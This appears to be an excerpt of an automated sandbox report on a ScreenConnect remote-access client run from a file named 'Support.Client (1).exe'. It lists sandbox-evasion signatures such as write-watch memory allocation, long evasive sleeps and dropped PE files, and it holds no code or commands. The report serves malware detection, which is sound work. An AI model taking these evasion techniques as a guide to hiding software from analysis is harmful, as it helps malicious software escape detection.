Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 2CAD88F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 2CAF2380000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 7B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1A460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: C60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 2630000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 4630000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 1EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 2160000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 1EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1AAF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: B80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599444	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599195	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597112	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595055	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593807	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592838	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 591688	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 2193			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 7333			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\9KAKXV2D.XK6\6ABM8A2B.QOV\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Support.Client (1).exe TID: 6892	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599668s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599560s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599444s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -599195s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597260s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -597112s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -595055s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7076	Thread sleep time: -594828s >= -30000s	Jump to behavior
